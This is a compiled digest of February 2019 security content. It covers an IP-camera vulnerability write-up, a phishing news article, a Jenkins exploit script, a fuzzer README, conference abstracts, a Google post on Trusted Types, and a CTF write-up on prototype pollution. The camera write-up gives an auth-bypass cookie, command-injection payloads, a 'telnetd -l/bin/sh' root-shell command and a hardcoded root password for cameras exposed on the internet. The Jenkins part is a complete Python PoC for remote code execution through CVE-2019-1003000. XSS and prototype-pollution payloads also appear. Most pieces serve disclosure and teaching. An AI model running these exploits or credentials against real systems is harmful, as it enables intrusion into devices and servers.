23, 80 and 554. Surprisingly, port 23 doesn’t get mentioned anywhere in the manual. Is this some debug port from the manufacturer, or a backdoor from the Chinese government? After manually testing a few passwords via telnet I moved on. When I connected to the admin panel - accessible on port 80 - I was greeted with a standard login screen that prompts the user for a username and password. The first step I took was opening the Chrome developer tab. This allows you to inspect the network requests that Chrome made while visiting a website. I saw that there were a lot of requests being made for a simple login page. 
My eye quickly fell on a specific request: /cgi-bin/hi3510/snap.cgi?&-getstream&-chn=2 Hmm, “getstream”, I wonder what happens if I open this in another tab… Within 2 minutes I’ve gained unauthenticated access to the live view of the camera. I knew that cheap Chinese cameras weren’t secure, but I didn’t expect it was this bad. Other observations While looking through the network requests, I noticed some more notable endpoints: You are able to get the Wi-Fi SSID, BSSID, and password from the network the camera is connected to by visiting /cgi-bin/getwifiattr.cgi. This allows you to retrieve the location of the camera via a service such as wigle.net. You are able to set the camera’s internal time via /cgi-bin/hi3510/setservertime.cgi?-time=YYYY.MM.DD.HH.MM.SS&-utc. I’m not sure if this opens up any attack vectors, but it’s interesting nonetheless. It might be possible to do some interesting things by sending invalid times or big strings, but I don’t want to risk bricking my camera testing this. You are able to get the camera’s password via /cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get. Of course, you don’t even need the password to log in. Just set the “AuthLevel” cookie to 255 and you instantly get admin access. You are able to get the serial number, hardware revision, uptime, and storage info via /web/cgi-bin/hi3510/param.cgi?cmd=getserverinfo All of these requests are unauthenticated. Remote code execution Let’s take another look at the requests made on the login page. You can see a lot of “.cgi” requests. CGI-files are “Common Gateway Interface” files. They are executable scripts used in web servers to dynamically create web pages. Because they’re often based on bash scripts, I started focusing on these requests first because I thought I might find an endpoint susceptible to bash code injection. To find out if a .cgi endpoint was vulnerable, I tried substituting some request parameters with $(sleep 3). 
When I tried /cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=$(sleep 3), it took a suspiciously long time before I got back my response. To confirm that I can execute bash code, I opened Wireshark on my laptop and sent the following payload to the camera: $(ping -c2 192.168.178.243) And sure enough, I saw two ICMP requests appear on my laptop. But surely, nobody in their right mind would connect such a cheap, insecure IP camera directly to the internet, right? That’s 710 Alecto DVC-155IP cameras connected to the internet that disclose their Wi-Fi details (which means that I can figure out its location by using a service such as wigle.net), allow anyone to view their live stream and are vulnerable to RCE. And this is just their DVC-155IP model, Alecto manufactures many different IP cameras each running the same software. Returning to port 23 Now that I’m able to run commands, it’s time to return to the mysterious port 23. Unfortunately, I’m not able to get any output from the commands I execute. Using netcat to send the output of the commands I executed also didn’t work for some reason. After spending way too much time without progress, this was the command that did the trick: telnetd -l/bin/sh -p9999 This starts a telnet server on port 9999. And sure enough, after connecting to it I was greeted with an unauthenticated root shell. Reading /etc/passwd gave me the following output: root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh I didn’t even have to start Hashcat for this one: a quick Google search of the hash was all I needed to find that the password of the mysterious backdoor port was cat1029. Yes, the password to probably thousands of IP cameras on the internet is cat1029. And the worst part is that there’s no possible way to change this password anywhere in the typical user interface. 
Contacting the manufacturer

When I contacted Alecto with my findings, they told me they weren’t able to fix these problems because they didn’t create the software for their devices. After a quick Shodan search I found internet-connected cameras from other brands, such as Foscam and DIGITUS, that had the same vulnerabilities. Their user interfaces look different, but they were susceptible to exactly the same vulnerabilities via exactly the same endpoints. It seems that these IP cameras are manufactured in bulk by a Chinese OEM. Other companies, like Alecto, Foscam, and DIGITUS, resell them with slightly modified firmware and custom branding. A vulnerability in the Chinese manufacturer’s software means that the products of all of its resellers are vulnerable too. Unfortunately, I don’t think that the Chinese OEM will do much about these vulnerabilities. I guess that the phrase “The S in IoT stands for security” is true after all.

Author | Maurits van Altvorst
I'm 16 years old and a student at Gemeentelijk Gymnasium Hilversum.
Source: https://www.mauritsvanaltvorst.com/rce-chinese-ip-cameras/
-
WARNING – New Phishing Attack That Even Most Vigilant Users Could Fall For
February 15, 2019 | Mohit Kumar

How do you check whether a website asking for your credentials is fake or legitimate? By checking if the URL is correct? By checking that the website address is not a homograph? By checking if the site is using HTTPS? Or by using software or browser extensions that detect phishing domains?

Well, if you, like most Internet users, rely on the basic security practices above to spot whether the "Facebook.com" or "Google.com" you have been served is fake, you may still fall victim to a newly discovered, creative phishing attack and end up giving away your passwords to hackers.

Antoine Vincent Jebara, co-founder and CEO of password managing software Myki, told The Hacker News that his team recently spotted a new phishing attack campaign "that even the most vigilant users could fall for." Vincent found that cybercriminals are distributing links to blogs and services that prompt visitors to first "login using Facebook account" to read an exclusive article or purchase a discounted product.

That’s fine. Login with Facebook, or any other social media service, is a safe method and is used by a large number of websites to make it easier for visitors to sign up for a third-party service quickly. Generally, when you click the "log in with Facebook" button on a website, you are either redirected to facebook.com or served facebook.com in a new pop-up browser window, which asks you to enter your Facebook credentials to authenticate using OAuth and to permit the service to access your profile’s necessary information.

However, Vincent discovered that the malicious blogs and online services serve users a very realistic-looking fake Facebook login prompt after they click the login button. The prompt has been designed to capture the credentials users enter, just like any phishing site.

As shown in the video demonstration Vincent shared with The Hacker News, the fake pop-up login prompt, which is actually built with HTML and JavaScript, is reproduced to look and feel exactly like a legitimate browser window: it has a status bar, a navigation bar, shadows and a URL pointing to the Facebook website, with a green padlock indicating valid HTTPS. Moreover, users can interact with the fake browser window, drag it around or close it in the same way as any legitimate window.

The only way to protect yourself from this type of phishing attack, according to Vincent, "is to actually try to drag the prompt away from the window it is currently displayed in. If dragging it out fails (part of the popup disappears beyond the edge of the window), it's a definite sign that the popup is fake."

Besides this, it is always recommended to enable two-factor authentication on every service that offers it, which prevents hackers from accessing your online accounts if they somehow manage to get your credentials.

Phishing schemes are still one of the most severe threats to users as well as companies, and hackers continue to try new and creative ways to trick you into providing sensitive and financial details that they could later use to steal your money or hack into your online accounts. Stay tuned, stay safe!
Source: https://thehackernews.com/2019/02/advance-phishing-login-page.html?m=1
-
#!/usr/bin/python
# Author: Adam Jordan
# Date: 2019-02-15
# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)

import argparse
import jenkins
import time
from xml.etree import ElementTree

payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString()
'''


def run_command(url, cmd, job_name, username, password):
    print '[+] connecting to jenkins...'
    server = jenkins.Jenkins(url, username, password)

    print '[+] crafting payload...'
    ori_job_config = server.get_job_config(job_name)
    et = ElementTree.fromstring(ori_job_config)
    et.find('definition/script').text = payload % cmd
    job_config = ElementTree.tostring(et, encoding='utf8', method='xml')

    print '[+] modifying job with payload...'
    server.reconfig_job(job_name, job_config)
    time.sleep(3)

    print '[+] putting job build to queue...'
    queue_number = server.build_job(job_name)
    time.sleep(3)

    print '[+] waiting for job to build...'
    queue_item_info = {}
    while 'executable' not in queue_item_info:
        queue_item_info = server.get_queue_item(queue_number)
        time.sleep(1)

    print '[+] restoring job...'
    server.reconfig_job(job_name, ori_job_config)

    print '[+] fetching output...'
    last_build_number = server.get_job_info(job_name)['lastBuild']['number']
    console_output = server.get_build_console_output(job_name, last_build_number)

    print '[+] OUTPUT:'
    print console_output


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Jenkins RCE')
    parser.add_argument('--url', help='target jenkins url')
    parser.add_argument('--cmd', help='system command to be run')
    parser.add_argument('--job', help='job name')
    parser.add_argument('--username', help='username')
    parser.add_argument('--password', help='password')
    args = parser.parse_args()
    run_command(args.url, args.cmd, args.job, args.username, args.password)

Source: https://gist.github.com/adamyordan/96da0ad5e72cbc97285f2df340cac43b
-
pe-afl combines static binary instrumentation on PE binary and WinAFL so that it can fuzz on windows user-mode application and kernel-mode driver without source or full symbols or hardware support

details, benchmark and some kernel-mode case study can be found on slide, which is presented on BluehatIL 2019

it is not so reliable and dirty, but it works and high-performance
i reported bugs on office,gdiplus,jet,clfs,cng,hid,... by using this tool
the instrumentation part on PE can be reused on many purpose

How-to instrument

instrument 2 NOP on entry point of calc.exe

    ida.exe demo\calc.exe
    # loading with pdb is more reliable if pdb is available
    File->script file->ida_dump.py
    python instrument.py -i"{0x1012d6c:'9090'}" demo\calc.exe demo\calc.exe.dump.txt
    # 0x1012d6c is entry point address, you can instrument from command-line or from __main__ in instrument.py

instrument each basic block for fuzzing

    ida.exe demo\msjet40.dll
    File->script file->ida_dump.py
    python pe-afl.py -m demo\msjet40.dll demo\msjet40.dll.dump.txt
    # msjet40 is multi-thread, so -m is here
    # see fuzz JetDB on win7

ps. instrument script run faster on non-windows

How-to fuzz

you have to implement the wrapper/harness (AFL\test_XXX) depends on target and add anything you want, such page heap, etc

fuzz JetDB on win7

    copy /Y msjet40.instrumented.dll C:\Windows\System32\msjet40.dll
    bin\afl-showmap.exe -o NUL -p msjet40.dll -- bin\test_mdb.exe demo\mdb\normal.mdb
    # make sure that capture is OK
    bin\AFL.exe -i demo\mdb -o out -t 5000 -m none -p msjet40.dll -- bin\test_mdb.exe @@

fuzz CLFS on win10

    install_helper.bat
    disable_dse.bat
    copy /Y clfs.instrumented.sys C:\Windows\System32\drivers\clfs.sys
    # reboot if necessary
    bin\afl-showmap.exe -o NUL -p clfs.sys -- bin\test_clfs.exe demo\blf\normal.blf
    # make sure that capture is OK
    bin\AFL.exe -i demo\blf -o out -t 5000 -m none -p clfs.sys -- bin\test_clfs.exe @@

How-to trace

import driver execution trace into lighthouse

    ida.exe demo\clfs.sys
    File->script file->ida_dump.py
    python pe-afl.py -cb demo\clfs.sys demo\clfs.sys.dump.txt
    copy /Y clfs.instrumented.sys C:\Windows\System32\drivers\clfs.sys
    # reboot if necessary
    bin\afl-showmap.exe -o NUL -p clfs.sys -d -- bin\test_clfs.exe demo\blf\normal.blf
    # output is trace.txt
    python lighthouse_trace.py demo\clfs.sys demo\clfs.sys.mapping.txt trace.txt > trace2.txt
    # install lighthouse
    xcopy /y /e lighthouse [IDA folder]\plugins\
    ida.exe demo\clfs.sys
    File->Load File->Code coverage file->trace2.txt

TODO

support x64

Source: https://github.com/wmliang/pe-afl
-
Abstracts

Attacking Edge Through the JavaScript Just-In-Time Compiler
Bruno Keith / Thursday, Feb 7, 10:30-11:15 AM

Bridging Emulation and the Real World with the Nintendo Game Boy
Or Pinchasof / Wednesday, Feb 6, 3:15-4:00 PM

Hardening Secure Boot on Embedded Devices for Hostile Environments
Niek Timmers | Riscure, Albert Spruyt, Cristofaro Mune | Pulse Security / Wednesday, Feb 6, 11:45-12:30 PM

Life as an iOS Attacker
Luca Todesco (@qwertyoruiop) / Thursday, Feb 7, 5:15-6:00 PM

Make Static Instrumentation Great Again: High Performance Fuzzing for Windows System
Lucas Leong, Trend Micro / Thursday, Feb 7, 4:30-5:15 PM

No Code No Crime: UPnP as an Off-the-Shelf Attacker's Toolkit
x0rz / Thursday, Feb 7, 12:30-1:00 PM

PE-sieve: An Open-Source Process Scanner for Hunting and Unpacking Malware
Hasherezade / Thursday, Feb 7, 2:30-3:15 PM

Postscript Pat and His Black and White Hat
Steven Seeley / Thursday, Feb 7, 3:15-4:00 PM

Practical Uses for Hardware-assisted Memory Visualization
Ulf Frisk / Wednesday, Feb 6, 4:30-5:15 PM

Supply Chain Security: "If I were a Nation State..."
Andrew "bunnie" Huang / Wednesday, Feb 6, 10:30-11:15 AM

The AMDFlaws Story: Technical Deep Dive
Ido Li On & Uri Farkas, CTS Labs / Wednesday, Feb 6, 5:15-6:00 PM

The Things That Lurk in the Shadows
Costin Raiu, Kaspersky Lab / Wednesday, Feb 6, 12:30-1:00 PM

Transmogrifying Other People's Marketing into Threat Hunting Treasures Using Machine Learning Magic
Bhavna Soman, Microsoft / Wednesday, Feb 6, 1:00-1:30 PM

Trends, Challenges, and Strategic Shifts in the Software Vulnerability Mitigation Landscape
Matt Miller, Microsoft / Thursday, Feb 7, 11:45-12:30 PM

Who’s Watching the Watchdog? Uncovering a Privilege Escalation Vulnerability in OEM Driver
Amit Rapaport, Microsoft / Thursday, Feb 7, 1:00-1:30 PM

You (dis)liked mimikatz? Wait for kekeo
Benjamin Delpy (@gentilkiwi) / Wednesday, Feb 6, 2:30-3:15 PM

Source: https://www.bluehatil.com/abstracts
-
Trusted Types help prevent Cross-Site Scripting

TL;DR: We've created a new experimental API that aims to prevent DOM-Based Cross Site Scripting in modern web applications.

By Krzysztof Kotowicz, Software Engineer in the Information Security Engineering team at Google

We’re currently working on the specification and implementation details for this API. We’ll keep this post updated as Trusted Types mature. Last update: 2019-02-15.

Cross-Site Scripting

Cross-Site Scripting (XSS) is the most prevalent vulnerability affecting web applications. We see this reflected both in our own data, and throughout the industry. Practice shows that maintaining an XSS-free application is still a difficult challenge, especially if the application is complex. While solutions for preventing server-side XSS are well known, DOM-based Cross-Site Scripting (DOM XSS) is a growing problem. For example, in Google's Vulnerability Reward Program DOM XSS is already the most common variant. Why is that? We think it's caused by two separate issues:

XSS is easy to introduce

DOM XSS occurs when one of the injection sinks in the DOM or other browser APIs is called with user-controlled data. For example, consider this snippet that intends to load a stylesheet for a given UI template the application uses:

    const templateId = location.hash.match(/tplid=([^;&]*)/)[1];
    // ...
    document.head.innerHTML += `<link rel="stylesheet" href="./templates/${templateId}/style.css">`

This code introduces DOM XSS by linking the attacker-controlled source (location.hash) with the injection sink (innerHTML). The attacker can exploit this bug by tricking their victim into visiting the following URL:

    https://example.com#tplid="><img src=x onerror=alert(1)>

It's easy to make this mistake in code, especially if the code changes often. For example, maybe templateId was once generated and validated on the server, so this value used to be trustworthy?
When assigning to innerHTML, all we know is that the value is a string, but should it be trusted? Where does it really come from? Additionally, the problem is not limited to just innerHTML. In a typical browser environment, there are over 60 sink functions or properties that require this caution. The DOM API is insecure by default and requires special treatment to prevent XSS. XSS is difficult to detect The code above is just an example, so it's trivial to see the bug. In practice, the sources and the sinks are often accessed in completely different application parts. The data from the source is passed around, and eventually reaches the sink. There are some functions that sanitize and verify the data. But was the right function called? Looking at the source code alone, it's difficult to know if it introduces a DOM XSS. It's not enough to grep the .js files for sensitive patterns. For one, the sensitive functions are often used through various wrappers and real-world vulnerabilities look more like this. Sometimes it's not even possible to tell if a codebase is vulnerable by only looking at it. obj[prop] = templateID If obj points to the Location object, and prop value is "href", this is very likely a DOM XSS, but one can only find that out when executing the code. As any part of your application can potentially hit a DOM sink, all of the code should undergo a manual security review to be sure - and the reviewer has to be extra careful to spot the bug. That's unlikely to happen. Trusted Types Trusted Types is the new browser API that might help address the above problems at the root cause - and in practice help obliterate DOM XSS. Trusted Types allow you to lock down the dangerous injection sinks - they stop being insecure by default, and cannot be called with strings. 
You can enable this enforcement by setting a special value in the Content Security Policy HTTP response header:

    Content-Security-Policy: trusted-types *

Then, in the document you can no longer use strings with the injection sinks:

    const templateId = location.hash.match(/tplid=([^;&]*)/)[1];
    // typeof templateId == "string"
    document.head.innerHTML += templateId // Throws a TypeError.

To interact with those functions, you create special typed objects - Trusted Types. Those objects can be created only by certain functions in your application called Trusted Type Policies. The example code "fixed" with Trusted Types would look like this:

    const templatePolicy = TrustedTypes.createPolicy('template', {
      createHTML: (templateId) => {
        const tpl = templateId;
        // One or more lowercase letters, digits, or hyphens.
        if (/^[0-9a-z-]+$/.test(tpl)) {
          return `<link rel="stylesheet" href="./templates/${tpl}/style.css">`;
        }
        throw new TypeError();
      }
    });

    const html = templatePolicy.createHTML(location.hash.match(/tplid=([^;&]*)/)[1]);
    // html instanceof TrustedHTML
    document.head.innerHTML += html;

Here, we create a template policy that verifies the passed template ID parameter and creates the resulting HTML. Each create* function of the policy object calls the corresponding user-defined function and wraps the result in a Trusted Type object. In this case, templatePolicy.createHTML calls the provided templateId validation function, and returns a TrustedHTML with the <link ...> snippet. The browser allows TrustedHTML to be used with an injection sink that expects HTML - like innerHTML.

It might seem that the only improvement is in adding the following check:

    if (/^[0-9a-z-]+$/.test(tpl)) { /* allow the tplId */ }

Indeed, this line is necessary to fix XSS. However, the real change is more profound. With Trusted Types enforcement, the only code that could introduce a DOM XSS vulnerability is the code of the policies. No other code can produce a value that the sink functions accept. As such, only the policies need to be reviewed for security issues.
In our example, it doesn't really matter where the templateId value comes from, as the policy makes sure it's correctly validated first - the output of this particular policy does not introduce XSS.

Limiting policies

Did you notice the * value that we used in the Content-Security-Policy header? It indicates that the application can create an arbitrary number of policies, provided each of them has a unique name. If applications can freely create a large number of policies, preventing DOM XSS in practice would be difficult. However, we can further limit this by specifying a whitelist of policy names like so:

    Content-Security-Policy: trusted-types template

This ensures that only a single policy, named template, can be created. That policy is then easy to identify in the source code, and can be effectively reviewed. With this, we can be certain that the application is free from DOM XSS. Nice job!

In practice, modern web applications need only a small number of policies. The rule of thumb is to create a policy where the client-side code produces HTML or URLs - in script loaders, HTML templating libraries or HTML sanitizers. The numerous dependencies that do not interact with the DOM do not need policies. Trusted Types ensure that they can't be the cause of XSS.

Get started

This is just a short overview of the API. We are working on providing more code examples, guides and documentation on how to migrate applications to Trusted Types. We feel this is the right moment for the web developer community to start experimenting with it. To get this new behavior on your site, you need to be signed up for the "Trusted Types" Origin Trial (in Chrome 73 through 76).
If you just want to try it out locally, starting from Chrome 73 the experiment can be enabled on the command line:

    chrome --enable-blink-features=TrustedDOMTypes

or

    chrome --enable-experimental-web-platform-features

Alternatively, visit chrome://flags/#enable-experimental-web-platform-features and enable the feature. All of those options enable the feature globally in Chrome for the current session. If you experience crashes, use --enable-features=BlinkHeapUnifiedGarbageCollection as a workaround. See bug 929601 for details.

We have also created a polyfill that enables you to test Trusted Types in other browsers. As always, let us know what you think. You can reach us on the trusted-types Google group or file issues on GitHub.
Source: https://developers.google.com/web/updates/2019/02/trusted-types
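As a rough illustration of the template policy discussed in this article, the validation step can be sketched as a plain function that runs outside the browser. This is only a sketch under stated assumptions: createTemplateHtml is a hypothetical name, the pattern assumes template IDs are one or more lowercase letters, digits, or hyphens, and in a browser with Trusted Types enabled the function would be supplied as the createHTML callback of a policy rather than called directly.

```javascript
// Hypothetical helper: validates a template ID and builds the <link> markup.
// Assumption: IDs consist of one or more lowercase letters, digits, or hyphens.
function createTemplateHtml(templateId) {
  if (/^[0-9a-z-]+$/.test(templateId)) {
    return `<link rel="stylesheet" href="./templates/${templateId}/style.css">`;
  }
  throw new TypeError(`Rejected template ID: ${JSON.stringify(templateId)}`);
}

// A well-formed ID yields markup.
const okHtml = createTemplateHtml('dark-theme2');

// The attack string from the URL example is rejected before it can reach a sink.
let rejected = false;
try {
  createTemplateHtml('"><img src=x onerror=alert(1)>');
} catch (e) {
  rejected = e instanceof TypeError;
}

console.log(okHtml, rejected);
```

Keeping the check in one small function mirrors the point made in the article: when policies are the only code that can produce sink-compatible values, this is the only place a reviewer has to look.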
-
Analysis and Exploitation of Prototype Pollution attacks on NodeJs - Nullcon HackIM CTF web 500 writeup
Feb 15, 2019 • ctf

Prototype Pollution attacks on NodeJs is recent research by Olivier Arteau, in which he showed how to exploit an application if we can pollute the prototype of a base object.

Introduction
Objects in JavaScript
Functions/Classes in JavaScript?
WTH is a constructor?
Prototypes in JavaScript
Prototype Pollution
Merge() - Why was it vulnerable?
References

Introduction

Prototype Pollution attacks, as the name suggests, are about polluting the prototype of a base object, which can sometimes lead to RCE. This is fantastic research by Olivier Arteau, who presented it in a talk at NorthSec 2018. Let’s take a look at the vulnerability in depth with an example from the Nullcon HackIM 2019 challenge named proton.

Objects in JavaScript

An object in JavaScript is nothing but a collection of key-value pairs, where each pair is known as a property. Let’s take an example to illustrate (you can use the browser console to execute it and try it yourself):

    var obj = { "name": "0daylabs", "website": "blog.0daylabs.com" }
    obj.name;         // prints "0daylabs"
    obj.website;      // prints "blog.0daylabs.com"
    console.log(obj); // prints the entire object along with all of its properties.

In the above example, name and website are the properties of the object obj. If you look carefully at the last statement, console.log prints out a lot more information than the properties we explicitly defined. Where are these properties coming from?

Object is the fundamental base object from which all other objects are created. We can create a truly empty object (without any properties, inherited or otherwise) by passing null to Object.create, but by default a newly created object gets a prototype that corresponds to its type and inherits all of that prototype's properties.

    console.log(Object.create(null)); // prints an empty object

Functions/Classes in JavaScript?
In JavaScript, classes and functions are closely related (a function itself serves as the constructor for the class, and there are no explicit “classes” as such). Let’s take an example:

    function person(fullName, age) {
        this.age = age;
        this.fullName = fullName;
        this.details = function() {
            return this.fullName + " has age: " + this.age;
        }
    }

    console.log(person.prototype); // prints the prototype property of the function
    /*
    {constructor: ƒ}
        constructor: ƒ person(fullName, age)
        __proto__: Object
    */

    var person1 = new person("Anirudh", 25);
    var person2 = new person("Anand", 45);

    console.log(person1);
    /*
    person {age: 25, fullName: "Anirudh"}
        age: 25
        fullName: "Anirudh"
        __proto__:
            constructor: ƒ person(fullName, age)
                arguments: null
                caller: null
                length: 2
                name: "person"
                prototype: {constructor: ƒ}
                __proto__: ƒ ()
                [[FunctionLocation]]: VM134:1
                [[Scopes]]: Scopes[1]
            __proto__: Object
    */

    console.log(person2);
    /*
    person {age: 45, fullName: "Anand"}
        age: 45
        fullName: "Anand"
        __proto__:
            constructor: ƒ person(fullName, age)
                arguments: null
                caller: null
                length: 2
                name: "person"
                prototype: {constructor: ƒ}
                __proto__: ƒ ()
                [[FunctionLocation]]: VM134:1
                [[Scopes]]: Scopes[1]
            __proto__: Object
    */

    person1.details(); // prints "Anirudh has age: 25"

In the above example, we defined a function named person and created 2 objects named person1 and person2. If we take a look at the properties of the newly created function and objects, we can note 2 things:

When a function is created, the JavaScript engine adds a prototype property to the function. This prototype property is an object (called the prototype object) and by default has a constructor property which points back to the function on which the prototype object is a property.

When an object is created, the JavaScript engine adds a __proto__ property to the newly created object which points to the prototype object of the constructor function. In short, object.__proto__ points to function.prototype.

WTH is a constructor?
Constructor is a magical property which returns the function that was used to create the object. The prototype object has a constructor which points to the function itself, and the constructor of the constructor is the global Function constructor.

    var person3 = new person("test", 55);
    person3.constructor;             // prints the function "person" itself
    person3.constructor.constructor; // prints ƒ Function() { [native code] } <- Global Function constructor
    person3.constructor.constructor("return 1");
    /*
    ƒ anonymous( ) { return 1 }
    */
    // Finally call the function
    person3.constructor.constructor("return 1")(); // returns 1

Prototypes in JavaScript

One of the things to note here is that the prototype property can be modified at run time to add/delete/edit entries. For example:

    function person(fullName, age) {
        this.age = age;
        this.fullName = fullName;
    }

    var person1 = new person("Anirudh", 25);

    person.prototype.details = function() {
        return this.fullName + " has age: " + this.age;
    }

    console.log(person1.details()); // prints "Anirudh has age: 25"

What we did above is modify the function’s prototype to add a new property. The same result can be achieved using objects:

    function person(fullName, age) {
        this.age = age;
        this.fullName = fullName;
    }

    var person1 = new person("Anirudh", 25);
    var person2 = new person("Anand", 45);

    // Using person1 object
    person1.constructor.prototype.details = function() {
        return this.fullName + " has age: " + this.age;
    }

    console.log(person1.details()); // prints "Anirudh has age: 25"
    console.log(person2.details()); // prints "Anand has age: 45" :O

Noticed anything suspicious? We modified the person1 object, so why was person2 also affected? The reason is that in the first example we directly modified person.prototype to add a new property, and in the 2nd example we did exactly the same thing, only through an object.
We have already seen that constructor returns the function with which the object was created, so person1.constructor points to the function person itself and person1.constructor.prototype is the same as person.prototype.

Prototype Pollution

Let’s take an example, obj[a][b] = value. If an attacker can control a and value, then they can set a to __proto__, and the property b will be defined for all existing objects of the application with the value value.

The attack is not as simple as the above statement makes it sound. According to the research paper, this is exploitable only if one of the following 3 things happens:

Object recursive merge
Property definition by path
Object clone

Let’s take the Nullcon HackIM challenge to see a practical scenario. The challenge starts with iterating a MongoDB id (which was trivial to do), after which we get access to the source code below:

    'use strict';

    const express = require('express');
    const bodyParser = require('body-parser')
    const cookieParser = require('cookie-parser');
    const path = require('path');

    const isObject = obj => obj && obj.constructor && obj.constructor === Object;

    function merge(a, b) {
        for (var attr in b) {
            if (isObject(a[attr]) && isObject(b[attr])) {
                merge(a[attr], b[attr]);
            } else {
                a[attr] = b[attr];
            }
        }
        return a
    }

    function clone(a) {
        return merge({}, a);
    }

    // Constants
    const PORT = 8080;
    const HOST = '0.0.0.0';
    const admin = {};

    // App
    const app = express();
    app.use(bodyParser.json())
    app.use(cookieParser());
    app.use('/', express.static(path.join(__dirname, 'views')));

    app.post('/signup', (req, res) => {
        var body = JSON.parse(JSON.stringify(req.body));
        var copybody = clone(body)
        if (copybody.name) {
            res.cookie('name', copybody.name).json({ "done": "cookie set" });
        } else {
            res.json({ "error": "cookie not set" })
        }
    });

    app.get('/getFlag', (req, res) => {
        var аdmin = JSON.parse(JSON.stringify(req.cookies))
        if (admin.аdmin == 1) {
            res.send("hackim19{}");
        } else {
            res.send("You are not authorized");
        }
    });

    app.listen(PORT, HOST);
    console.log(`Running on http://${HOST}:${PORT}`);

The code starts by defining a function merge, which is essentially an insecure way of merging 2 objects. Since the latest versions of the libraries that provide merge() have already been patched, the challenge deliberately used the old way of merging to make it vulnerable.

One thing we can quickly notice in the above code is the definition of 2 “admins”, as const admin and var аdmin. JavaScript doesn’t allow a const variable to be defined again as var, so these have to be different names. It took a good amount of time to figure out that one of them has a normal a while the other has a different character that looks like a (a homograph). So instead of wasting time on it, I renamed it to a normal a and worked on the challenge, so that once it was solved, the payload could be adjusted accordingly.

From the challenge source code, here are the observations:

The merge() function is written in a way that allows prototype pollution (more analysis of this later in the article). So that’s indeed the way to solve the problem.

The vulnerable function is called via clone(body) when hitting /signup, so we can send a JSON payload while signing up that adds the admin property, and then immediately call /getFlag to get the flag.

As discussed above, we can use __proto__ (which points to constructor.prototype) to create the admin property with value 1. The simplest payload to do so:

    {"__proto__": {"admin": 1}}

So the final payload to solve the problem (using curl, since I was not able to send the homograph via Burp):

    curl -vv --header 'Content-type: application/json' -d '{"__proto__": {"admin": 1}}' 'http://0.0.0.0:4000/signup'; curl -vv 'http://0.0.0.0:4000/getFlag'

Merge() - Why was it vulnerable?

One obvious question here is, what makes the merge() function vulnerable?
Here is how it works and what makes it vulnerable: The function starts with iterating all properties that is present on the 2nd object b (since 2nd is given preference incase of same key-value pairs). If the property exists on both first and second arguments and they are both of type Object, then it recusively starts to merge it. Now if we can control the value of b[attr] to make attr as __proto__ and also if we can control the value inside the proto property in b, then while recursion, a[attr] at some point will actually point to prototype of the object a and we can successfully add a new property to all the objects. Still confused ? Well I don’t blame, because it took sometime for me also to understand the concept. Let’s write some debug statements to figure out what is happening. const isObject = obj => obj && obj.constructor && obj.constructor === Object; function merge(a, b) { console.log(b); // prints { __proto__: { admin: 1 } } for (var attr in b) { console.log("Current attribute: " + attr); // prints Current attribute: __proto__ if (isObject(a[attr]) && isObject(b[attr])) { merge(a[attr], b[attr]); } else { a[attr] = b[attr]; } } return a } function clone(a) { return merge({}, a); } Now let’s try sending the curl request mentioned above. What we can notice is that the object b now has the value: { __proto__: { admin: 1 } } where __proto__ is just a property name and is not actually pointing to function prototype. Now during the function merge(), for (var attr in b) iterates through every attribute where the first attribute name now is __proto__. Since it’s always of type object, it starts to recursively call, this time as merge(a[__proto__], b[__proto__]). This essentially helped us in getting access to function prototype of a and add new properties which is defined in the proto property of b. 
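To make the walkthrough above concrete, here is a minimal sketch that runs the challenge's merge() next to a hardened variant. The safeMerge function and the BLOCKED_KEYS list are illustrative assumptions, not code from the challenge or from any particular library; real libraries may apply different checks.

```javascript
// Same check as the challenge code: true only for plain objects.
const isObject = obj => obj && obj.constructor && obj.constructor === Object;

// Vulnerable merge, copied from the challenge source.
function merge(a, b) {
  for (var attr in b) {
    if (isObject(a[attr]) && isObject(b[attr])) {
      merge(a[attr], b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a;
}

// Hypothetical hardened variant (an assumption for illustration):
// only walk own keys and skip the ones that reach the prototype chain.
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function safeMerge(a, b) {
  for (const attr of Object.keys(b)) {
    if (BLOCKED_KEYS.has(attr)) continue;
    if (isObject(a[attr]) && isObject(b[attr])) {
      safeMerge(a[attr], b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a;
}

// JSON.parse creates "__proto__" as an ordinary own property, as in the challenge.
const payload = JSON.parse('{"__proto__": {"admin": 1}}');

safeMerge({}, payload);
const afterSafe = ({}).admin;        // no pollution: a fresh object has no admin

merge({}, payload);
const afterVulnerable = ({}).admin;  // polluted: every object now inherits admin

// Clean up so the rest of the process is not affected by the demo.
delete Object.prototype.admin;

console.log(afterSafe, afterVulnerable);
```

Skipping a fixed list of keys is only one possible mitigation; creating the target with Object.create(null) or using a Map for untrusted keys are other common choices.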
References
Olivier Arteau – Prototype pollution attacks in NodeJS applications
Prototypes in javaScript
MDN Web Docs - Object

Anirudh Anand
Security Engineer @flipkart | Web Application Security ♥ | Google, Microsoft, Zendesk, Gitlab Hall of Fames | Blogger | CTF lover - @teambi0s | certs - eWDP, OSCP

Source: https://blog.0daylabs.com/2019/02/15/prototype-pollution-javascript/
Trends, Challenges, and Strategic Shifts in the Software Vulnerability Mitigation Landscape The software vulnerability landscape has changed dramatically over the past 20+ years. During this period, we’ve gone from easy-to-exploit stack buffer overruns to complex-and-expensive chains of multiple exploits. To better understand this evolution, this presentation will describe the vulnerability mitigation strategy Microsoft has been pursuing and will show how this strategy has influenced vulnerability and exploitation trends over time. This retrospective will form the basis for discussing some of the vulnerability mitigation challenges that exist today and the strategic shifts that Microsoft is exploring to address those challenges.
Thursday, 14 February 2019
Accessing Access Tokens for UIAccess

